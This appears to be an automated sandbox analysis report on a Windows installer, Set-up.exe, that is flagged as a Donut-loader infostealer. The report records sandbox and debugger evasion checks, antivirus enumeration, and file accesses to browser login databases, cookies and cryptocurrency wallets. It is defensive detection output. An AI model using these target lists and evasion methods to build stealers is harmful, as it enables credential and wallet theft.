          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_058FCF700_2_058FCF70
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_05920EA00_2_05920EA0
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_058F4E660_2_058F4E66
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_058EDE600_2_058EDE60
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_058ED9800_2_058ED980
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_058E39B00_2_058E39B0
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0591E9D00_2_0591E9D0
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_058FD8A00_2_058FD8A0
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_059168D00_2_059168D0
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_058FDBC00_2_058FDBC0
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0590FBE00_2_0590FBE0
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_058F9BF20_2_058F9BF2
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_05916B300_2_05916B30
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_05905AF40_2_05905AF4
          Source: C:\Users\user\Desktop\Set-up.exeCode function: String function: 00E43A10 appears 122 times
          Source: C:\Users\user\Desktop\Set-up.exeCode function: String function: 00E5E110 appears 53 times
          Source: C:\Users\user\Desktop\Set-up.exeCode function: String function: 058ECC50 appears 51 times
          Source: C:\Users\user\Desktop\Set-up.exeCode function: String function: 00E51600 appears 34 times
          Source: C:\Users\user\Desktop\Set-up.exeCode function: String function: 00E44630 appears 315 times
          Source: C:\Users\user\Desktop\Set-up.exeCode function: String function: 0547E4C8 appears 43 times
          Source: C:\Users\user\Desktop\Set-up.exeCode function: String function: 011196A1 appears 46 times
          Source: Set-up.exeStatic PE information: invalid certificate
          Source: Set-up.exeStatic PE information: Resource name: B7 type: 7-zip archive data, version 0.4
          Source: Set-up.exeStatic PE information: Resource name: RT_STRING type: CLIPPER COFF executable (VAX #) not stripped - version 71
          Source: Set-up.exe, 00000000.00000003.1829704509.00000000066E5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePPSSPP.exe. vs Set-up.exe
          Source: Set-up.exe, 00000000.00000000.1701749914.00000000017B5000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameupdater.exe> vs Set-up.exe
          Source: Set-up.exe, 00000000.00000000.1701749914.00000000017B5000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameUpdaterSetup.exeB vs Set-up.exe
          Source: Set-up.exe, 00000000.00000003.1829704509.000000000639B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameupdater.exe> vs Set-up.exe
          Source: Set-up.exe, 00000000.00000003.1829704509.000000000639B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUpdaterSetup.exeB vs Set-up.exe
          Source: Set-up.exeBinary or memory string: OriginalFilenameupdater.exe> vs Set-up.exe
          Source: Set-up.exeBinary or memory string: OriginalFilenameUpdaterSetup.exeB vs Set-up.exe
          Source: Set-up.exeBinary or memory string: OriginalFilenamePPSSPP.exe. vs Set-up.exe
          Source: Set-up.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: 00000000.00000002.2074330703.0000000005470000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
          Source: Set-up.exeBinary string: BNtQueryObject()\Device\Mup\\Device\VBoxMiniRdr\ :\Device\LanmanRedirector\\Device\WebDavRedirector\GetFinalPathNameByHandle().tmp\\?\ :\\?\GLOBALROOTNtSetInformationFile(FileRenameInformation)SetFileInformationByHandle(FileDispositionInfo)SetFileInformationByHandle(FileRenameInfo)NtSetInformationFile(FileDispositionInformation)QtBytes: data is outside of the specified objectQtVect[Quantum]QtOutPort[Quantum]QtOutPort[QtBytes]QtBytesQuantumQtVect[QtBytes]QtBytes, in QtBytes::Encode()QtVectS[QtBytes] bytes
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@4/2
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00E4C7F0 GetLastError,FormatMessageW,SetLastError,0_2_00E4C7F0
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00E8C970 CreateToolhelp32Snapshot,GetCurrentProcessId,Process32FirstW,PathIsPrefixW,Process32NextW,PathIsPrefixW,GetLastError,__CxxThrowException@8,0_2_00E8C970
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_05917490 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,GetVolumeInformationW,0_2_05917490
          Source: Set-up.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\Set-up.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: Set-up.exe, 00000000.00000003.1863626522.000000000639B000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1863047400.00000000063B6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
          Source: Set-up.exeReversingLabs: Detection: 31%
          Source: Set-up.exeString found in binary or memory: CSshClient::CliCommonParam::GetKeypairFile::KeypairImporterInterface::GetPassphraseCould not import the keypair specified with -: passphrase in - is invalid.: a passphrase needs to be provided using -Importing keypair specified with - parameter failed: parameter value; try -help for more information.globalparameteropensshputtyprefersupport parameter value; expecting 'p' to prefer, 's' to support, or 'n' to not use. parameter value: expecting IPv4 and/or IPv6 interface.The file is too big.lowhigh parameter value; expecting numeric value or 'Default'. parameter value is too ; using the est valid value instead. parameter value; expecting 'r' to require or 's' to support.Invalid host parameter; malformed host part.Invalid host parameter; empty host part.Invalid host parameter; malformed port part. parameter was received from the internet. Only safe parts of the profile will be loaded. If you trust this profile, open it in the graphical SSH Client to unblock it, or open the file's Properties in Windows File Explorer and select Unblock.It appears the profile specified using the - parameter are not supported: algorithms specified with -Loading profile specified with - parameter failed: Profile file: Importing host keys specified with -Unreferenced socks4socksv4socks5socksv5httphttpconnectssh parameter value: nested SSH jump proxy connections are not supported. 
parameter value; expecting 'SOCKS4', 'SOCKS5', or 'HTTP'.'HTTP', or 'SSH'.=SSH parameter cannot be used without the -: cannot be used with proxy server disabled: can only be used with a proxy server enabled: cannot be used with a SOCKSv4 proxy server: cannot be used with an SSH jump proxy server: can only be used with an SSH jump proxy server parameter has failed: Reason: If this client is being run under a different Windows account than the one that generated the keypair, export the keypair into a file and use the - prevents global client keys from loading.The use of Unable to add client key.licensed to This license is good for business and government use.
          Source: Set-up.exeString found in binary or memory: (display usage information)-help-usage(displays help page by page)-help | more(creates a text file you can open e.g. with Notepad)-help > h.txt(display help for parameters in general)-help-params(display help for a particular parameter)-help-<param>(display examples)-help-examples(display return codes)-help-codes-help-params | more, try:
          Source: Set-up.exeString found in binary or memory: p\E ( value. and Unrecognized -The - parameter value must be a number between ]checkinstallqueryignoreUpgradeAccesslatestqueryConfigkillautoUpdatesconfigmachineWideupdateCheckDelayHoursMissing -BvSshUpdate parameter., -BvSshUpdate must be run elevated and with administrative rights to apply machine-wide update settings. or -At least one of the - parameters must be provided.hours|Checks if a newer version of the SSH Client is available.y|nApplies an update as specified by other parameters.Shows the result of the last successful check for updates.Specifies to apply the latest recommended update.Specifies the version number of the update to apply.Specifies to apply the latest available update.Specifies to apply the latest strongly recommended update.Terminates other SSH Client processes before starting the update. The update will require this parameter to start if any other processes are running.If the SSH Client is activated using a purchased license, forces the selected update to be applied, even if the update requires a new activation code with extended upgrade access. The upgrade will cause the SSH Client to revert to free of charge license terms.Applies update settings as specified by other provided parameters.Shows currently configured update settings.Configures the update check delay (in hours). If not specified, the currently effective value is preserved.Configures automatic update behavior. If not specified, the currently effective value is preserved.a scriptable update managerUse 'y' to set update settings globally for all Windows accounts, 'n' to use per-user settings. If not specified, update settings will remain machine-wide if they are currently machine-wide, or per-user if they are currently per-user. OR ) OR] OR(- [-] [- OR OR -] [-Installs the latest available recommended update. 
Upgrade access restrictions may apply if using a purchased license.BvSshUpdate -checkInstalls the latest strongly recommended update even if the current installation is activated using a purchased SSH Client license and the current activation code does not have upgrade access to the latest strongly recommended update.BvSshUpdate -install -recommendedInstalls the update with version <v> if it is available. Upgrade access restrictions may apply if using a purchased license.BvSshUpdate -install -stronglyRecommended -ignoreUpgradeAccessInstalls the update with version <v> even if the current installation is activated using a purchased SSH Client license, and the current activation code does not have upgrade access to the selected version.BvSshUpdate -install -version=<v>Installs the latest available update. Upgrade access restrictions may apply if using a purchased license. If any other SSH Client processes are running, they will be terminated before applying the update.BvSshUpdate -install -version=<v> -ignoreUpgradeAccessShows currently effective update settings.BvSshUpdate -install -latest -killDisables automatic updates for all users.BvSshUpdate -queryConfi
          Source: Set-up.exeString found in binary or memory: http://support.google.com/installer/
          Source: Set-up.exeString found in binary or memory: ..\..\chrome\updater\app\app_install_win.ccUpdate success.No updates.Updater error: http://support.google.com/installer/%s?product=%s&error=%d installation completed: error category[], error_code[], extra_code1[], completion_message[], post_install_launch_command_line[]oemSetOemInstallState failedStoreRunTimeEnrollmentToken failed
          Source: Set-up.exeString found in binary or memory: https://dl.google.com/update2/installers/icons/
          Source: Set-up.exeString found in binary or memory: Fhttps://update.googleapis.com/service/update2/jsonhttps://clients2.google.com/cr/reporthttps://m.google.com/devicemanagement/data/apihttps://dl.google.com/update2/installers/icons/enterprise_companion.mojom.EnterpriseCompanionReceive mojo replyReceive mojo message
          Source: Set-up.exeString found in binary or memory: Try '%ls --help' for more information.
          Source: Set-up.exeString found in binary or memory: --help display this help and exit
          Source: Set-up.exeString found in binary or memory: partition_alloc/address_space
          Source: Set-up.exeString found in binary or memory: overflow:hidden;img src="http://addEventListenerresponsible for s.js"></script>
          Source: Set-up.exeString found in binary or memory: asennuksen: $1oError sa pag-install: Nag-apply ang administrator ng network mo ng Group Policy na pumipigil sa pag-install: $1
          Source: Set-up.exeString found in binary or memory: Tapos na ang pag-install.
          Source: Set-up.exeString found in binary or memory: Kanselahin ang Pag-install
          Source: Set-up.exeString found in binary or memory: Error sa pag-install: $1
          Source: Set-up.exeString found in binary or memory: isvaatimuksia.fHindi na-install dahil hindi natutugunan ng iyong computer ang mga minimum na requirement sa hardware.mL'installation a
          Source: Set-up.exeString found in binary or memory: Inihinto ang Pag-install.
          Source: Set-up.exeString found in binary or memory: $1-installeerder
          Source: Set-up.exeString found in binary or memory: $1-Installationsprogramm
          Source: Set-up.exeString found in binary or memory: $1-installatieprogramma
          Source: Set-up.exeString found in binary or memory: $1-installasjonsprogram
          Source: Set-up.exeString found in binary or memory: .:Asennusvirhe: Asennusprosessin aloittaminen ei onnistunut.?Error sa pag-install: Hindi nagsimula ang proseso ng installer.GErreur d'installation
          Source: Set-up.exeString found in binary or memory: .LAsennusvirhe: Asennusohjelmaa ei suoritettu loppuun. Asennus on keskeytetty.LError sa pag-install: Hindi natapos ang installer. Na-abort ang pag-install.tErreur d'installation
          Source: Set-up.exeString found in binary or memory: Ini-install...
          Source: Set-up.exeString found in binary or memory: 3Asennus ei ole valmis. Haluatko varmasti perua sen?IHindi nakumpleto ang pag-install. Sigurado ka bang gusto mong kanselahin?9Installation non termin
          Source: Set-up.exeString found in binary or memory: uudelleen.#Hindi na-install. Pakisubukan ulit.,
          Source: Set-up.exeString found in binary or memory: isen virheen takia.FHindi na-install dahil sa isang internal na error sa server ng update.Q
          Source: Set-up.exeString found in binary or memory: ei tueta.OError sa pag-install: Invalid o hindi sinusuportahan ang filename ng installer.fErreur d'installation
          Source: Set-up.exeString found in binary or memory: ivityspalvelimella ei ole tiivistedataa sovelluksesta.\Hindi na-install dahil walang anumang data ng hash para sa application ang server ng update.p
          Source: Set-up.exeString found in binary or memory: n versiota ei tueta.QHindi na-install dahil hindi sinusuportahan ang bersyong ito ng operating system.ZL'installation a
          Source: Set-up.exeString found in binary or memory: maassa.AHindi na-install dahil pinaghihigpitan ang access sa bansang ito.=L'installation a
          Source: Set-up.exeString found in binary or memory: Ituloy ang Pag-install
          Source: Set-up.exeString found in binary or memory: Nakansela ang pag-install.
          Source: Set-up.exeString found in binary or memory: n.\Salamat sa pag-install. Dapat mong i-restart ang lahat ng iyong browser bago gamitin ang $1.eMerci d'avoir install
          Source: Set-up.exeString found in binary or memory: n.SSalamat sa pag-install. Dapat mong i-restart ang iyong browser bago gamitin ang $1.aMerci d'avoir install
          Source: Set-up.exeString found in binary or memory: n.TSalamat sa pag-install. Dapat mong i-restart ang iyong computer bago gamitin ang $1.aMerci d'avoir install
          Source: Set-up.exeString found in binary or memory: .4Asennus ei onnistu, palvelin ei tunnista sovellusta.9Hindi na-install, hindi kilala ng server ang application.=Installation impossible. Le serveur ne reconna
          Source: Set-up.exeString found in binary or memory: onnistui, koska protokollaa ei tueta.BHindi na-install dahil sa error na hindi sinusuportahang protocol.K
          Source: Set-up.exeString found in binary or memory: si Windows-versiota ei tueta.IHindi na-install dahil hindi sinusuportahan ang iyong bersyon ng Windows.V
          Source: Set-up.exeString found in binary or memory: Naghihintay sa pag-install...
          Source: C:\Users\user\Desktop\Set-up.exeFile read: C:\Users\user\Desktop\Set-up.exe
          Source: C:\Users\user\Desktop\Set-up.exeSection loaded: wininet.dll
          Source: C:\Users\user\Desktop\Set-up.exeSection loaded: userenv.dll
          Source: C:\Users\user\Desktop\Set-up.exeSection loaded: secur32.dll
          Source: C:\Users\user\Desktop\Set-up.exeSection loaded: iphlpapi.dll
          Source: C:\Users\user\Desktop\Set-up.exeSection loaded: sspicli.dll
          Source: C:\Users\user\Desktop\Set-up.exeSection loaded: mscoree.dll
          Source: C:\Users\user\Desktop\Set-up.exeSection loaded: winhttp.dll
          Source: C:\Users\user\Desktop\Set-up.exeSection loaded: ondemandconnroutehelper.dll
          Source: C:\Users\user\Desktop\Set-up.exeSection loaded: webio.dll
          Source: C:\Users\user\Desktop\Set-up.exeSection loaded: mswsock.dll
          Source: C:\Users\user\Desktop\Set-up.exeSection loaded: winnsi.dll
          Source: C:\Users\user\Desktop\Set-up.exeSection loaded: dnsapi.dll
          Source: C:\Users\user\Desktop\Set-up.exeSection loaded: rasadhlp.dll
          Source: C:\Users\user\Desktop\Set-up.exeSection loaded: fwpuclnt.dll
          Source: C:\Users\user\Desktop\Set-up.exeSection loaded: schannel.dll
          Source: C:\Users\user\Desktop\Set-up.exeSection loaded: mskeyprotect.dll
          Source: C:\Users\user\Desktop\Set-up.exeSection loaded: ntasn1.dll
          Source: C:\Users\user\Desktop\Set-up.exeSection loaded: ncrypt.dll
          Source: C:\Users\user\Desktop\Set-up.exeSection loaded: ncryptsslp.dll
          Source: C:\Users\user\Desktop\Set-up.exeSection loaded: msasn1.dll
          Source: C:\Users\user\Desktop\Set-up.exeSection loaded: cryptsp.dll
          Source: C:\Users\user\Desktop\Set-up.exeSection loaded: rsaenh.dll
          Source: C:\Users\user\Desktop\Set-up.exeSection loaded: cryptbase.dll
          Source: C:\Users\user\Desktop\Set-up.exeSection loaded: gpapi.dll
          Source: C:\Users\user\Desktop\Set-up.exeSection loaded: dpapi.dll
          Source: C:\Users\user\Desktop\Set-up.exeSection loaded: kernel.appcore.dll
          Source: C:\Users\user\Desktop\Set-up.exeSection loaded: uxtheme.dll
          Source: C:\Users\user\Desktop\Set-up.exeSection loaded: wbemcomn.dll
          Source: C:\Users\user\Desktop\Set-up.exeSection loaded: amsi.dll
          Source: C:\Users\user\Desktop\Set-up.exeSection loaded: profapi.dll
          Source: C:\Users\user\Desktop\Set-up.exeSection loaded: version.dll
          Source: Set-up.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
          Source: Set-up.exeStatic file information: File size 14085344 > 1048576
          Source: Set-up.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x380400
          Source: Set-up.exeStatic PE information: Raw size of .rdata is bigger than: 0x100000 < 0x154a00
          Source: Set-up.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x5d0000
          Source: Set-up.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
          Source: Set-up.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
          Source: Set-up.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
          Source: Set-up.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Set-up.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
          Source: Set-up.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
          Source: Set-up.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
          Source: Binary string: D:\Temp\BuildTemp\1.18_Windows_BUILD\ppsspp\PPSSPPWindows.pdb source: Set-up.exe
          Source: Binary string: D:\repos\main\SSH2\Release\pdbs\BvSshUpdate.pdb source: Set-up.exe
          Source: Binary string: updater.exe.pdb source: Set-up.exe
          Source: Binary string: D:\Temp\BuildTemp\1.18_Windows_BUILD\ppsspp\PPSSPPWindows.pdb& source: Set-up.exe
          Source: Set-up.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
          Source: Set-up.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
          Source: Set-up.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
          Source: Set-up.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
          Source: Set-up.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00E323B0 VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,GetLastError,GetSystemDirectoryW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,LoadLibraryW,GetProcAddress,GetProcAddress,VerSetConditionMask,VerSetConditionMask,GetLastError,FreeLibrary,SetLastError,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,0_2_00E323B0
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00E57798 push esi; ret 0_2_00E577A0
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_01119FF6 push ecx; ret 0_2_0111A009
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_054961AF push ecx; ret 0_2_054961B0
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_05904937 push ecx; ret 0_2_05904938
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00E4EAD0 InterlockedCompareExchange,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,InterlockedExchange,SwitchToThread,0_2_00E4EAD0
          Source: C:\Users\user\Desktop\Set-up.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
          Source: C:\Users\user\Desktop\Set-up.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
          Source: C:\Users\user\Desktop\Set-up.exeProcess information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          Source: C:\Users\user\Desktop\Set-up.exeSystem information queried: FirmwareTableInformation
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_00E8C970 CreateToolhelp32Snapshot,GetCurrentProcessId,Process32FirstW,PathIsPrefixW,Process32NextW,PathIsPrefixW,GetLastError,__CxxThrowException@8,0_2_00E8C970
          Source: C:\Users\user\Desktop\Set-up.exeAPI coverage: 5.1 %
          Source: C:\Users\user\Desktop\Set-up.exe TID: 6448Thread sleep time: -150000s >= -30000s
          Source: C:\Users\user\Desktop\Set-up.exe TID: 6636Thread sleep time: -30000s >= -30000s
          Source: C:\Users\user\Desktop\Set-up.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
          Source: Set-up.exeBinary or memory string: hGfsd
          Source: Set-up.exe, 00000000.00000003.2072008223.0000000003B23000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.2073967140.0000000003B23000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW ;
          Source: Set-up.exeBinary or memory string: BNtQueryObject()\Device\Mup\\Device\VBoxMiniRdr\ :\Device\LanmanRedirector\\Device\WebDavRedirector\GetFinalPathNameByHandle().tmp\\?\ :\\?\GLOBALROOTNtSetInformationFile(FileRenameInformation)SetFileInformationByHandle(FileDispositionInfo)SetFileInformationByHandle(FileRenameInfo)NtSetInformationFile(FileDispositionInformation)QtBytes: data is outside of the specified objectQtVect[Quantum]QtOutPort[Quantum]QtOutPort[QtBytes]QtBytesQuantumQtVect[QtBytes]QtBytes, in QtBytes::Encode()QtVectS[QtBytes] bytes
          Source: Set-up.exe, 00000000.00000002.2073921655.0000000003AD8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWp
          Source: Set-up.exe, 00000000.00000003.2072008223.0000000003B23000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.2073967140.0000000003B23000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: Set-up.exe, 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: NtQueryObject()\Device\Mup\\Device\VBoxMiniRdr\ :\Device\LanmanRedirector\\Device\WebDavRedirector\GetFinalPathNameByHandle().tmp\\?\ :\\?\GLOBALROOTNtSetInformationFile(FileRenameInformation)SetFileInformationByHandle(FileDispositionInfo)SetFileInformationByHandle(FileRenameInfo)NtSetInformationFile(FileDispositionInformation)QtBytes: data is outside of the specified objectQtVect[Quantum]QtOutPort[Quantum]QtOutPort[QtBytes]QtBytesQuantumQtVect[QtBytes]QtBytes, in QtBytes::Encode()QtVectS[QtBytes] bytes
          Source: C:\Users\user\Desktop\Set-up.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0591CE20 LdrInitializeThunk,0_2_0591CE20
          Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_0111911A IsDebuggerPresent,OutputDebugStringW,0_2_0111911A
          Source: C:\Users\user\Desktop\Set-up.exe Code function: 0_2_01124C83 mov eax, dword ptr fs:[00000030h] 0_2_01124C83
          Source: C:\Users\user\Desktop\Set-up.exe Code function: 0_2_054703FB mov edx, dword ptr fs:[00000030h] 0_2_054703FB
          Source: C:\Users\user\Desktop\Set-up.exe Code function: 0_2_054709BB mov eax, dword ptr fs:[00000030h] 0_2_054709BB
          Source: C:\Users\user\Desktop\Set-up.exe Code function: 0_2_0547100B mov eax, dword ptr fs:[00000030h] 0_2_0547100B
          Source: C:\Users\user\Desktop\Set-up.exe Code function: 0_2_0547100A mov eax, dword ptr fs:[00000030h] 0_2_0547100A
          Source: C:\Users\user\Desktop\Set-up.exe Code function: 0_2_05470D6B mov eax, dword ptr fs:[00000030h] 0_2_05470D6B
          Source: C:\Users\user\Desktop\Set-up.exe Code function: 0_2_0111995A SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_0111995A
          Source: C:\Users\user\Desktop\Set-up.exe Code function: 0_2_01122F75 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_01122F75

          HIPS / PFW / Operating System Protection Evasion

          Source: C:\Users\user\Desktop\Set-up.exe Code function: 0_2_00E44630 IsDebuggerPresent,DebugBreak,GetModuleFileNameA,Concurrency::cancel_current_task,GetCurrentProcessId,GetCurrentThreadId,__CxxThrowException@8,__CxxThrowException@8,___std_exception_copy, 0_2_00E44630
          Source: C:\Users\user\Desktop\Set-up.exe Code function: 0_2_00E44BE0 IsDebuggerPresent,DebugBreak,ExitProcess, 0_2_00E44BE0
          Source: C:\Users\user\Desktop\Set-up.exe Code function: 0_2_00E5A820 SetSecurityDescriptorDacl,GetLastError,__CxxThrowException@8, 0_2_00E5A820
          Source: C:\Users\user\Desktop\Set-up.exe Queries volume information: C:\ VolumeInformation
          Source: C:\Users\user\Desktop\Set-up.exe Code function: 0_2_0112A159 GetSystemTimeAsFileTime, 0_2_0112A159
          Source: C:\Users\user\Desktop\Set-up.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
          Source: Set-up.exe, 00000000.00000003.2071984278.0000000003BC7000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1977212265.0000000003BC7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %\Windows Defender\MsMpeng.exe
          Source: Set-up.exe, 00000000.00000003.1960858747.0000000003BC7000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.2074136163.0000000003B89000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1977297210.0000000003B88000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2072348200.0000000003B89000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2072008223.0000000003B89000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
          Source: C:\Users\user\Desktop\Set-up.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

          Stealing of Sensitive Information

          Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
          Source: Yara match File source: Process Memory Space: Set-up.exe PID: 6544, type: MEMORYSTR
          Source: Yara match File source: sslproxydump.pcap, type: PCAP
          Source: Set-up.exe, 00000000.00000003.2072008223.0000000003B23000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Wallets/Electrum-LTC
          Source: Set-up.exe, 00000000.00000003.2072008223.0000000003B23000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Wallets/ElectronCash
          Source: Set-up.exe, 00000000.00000003.1946139098.0000000003B8A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
          Source: Set-up.exe, 00000000.00000003.2072008223.0000000003B23000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: window-state.json
          Source: Set-up.exe, 00000000.00000003.1946139098.0000000003B8A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Wallets/Exodus
          Source: Set-up.exe, 00000000.00000003.2072008223.0000000003B23000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %appdata%\Ethereum
          Source: Set-up.exe, 00000000.00000003.1946139098.0000000003B8A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
          Source: Set-up.exe, 00000000.00000003.1946139098.0000000003B8A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: keystore
          Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
          Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
          Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
          Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
          Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
          Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
          Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
          Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
          Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
          Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db
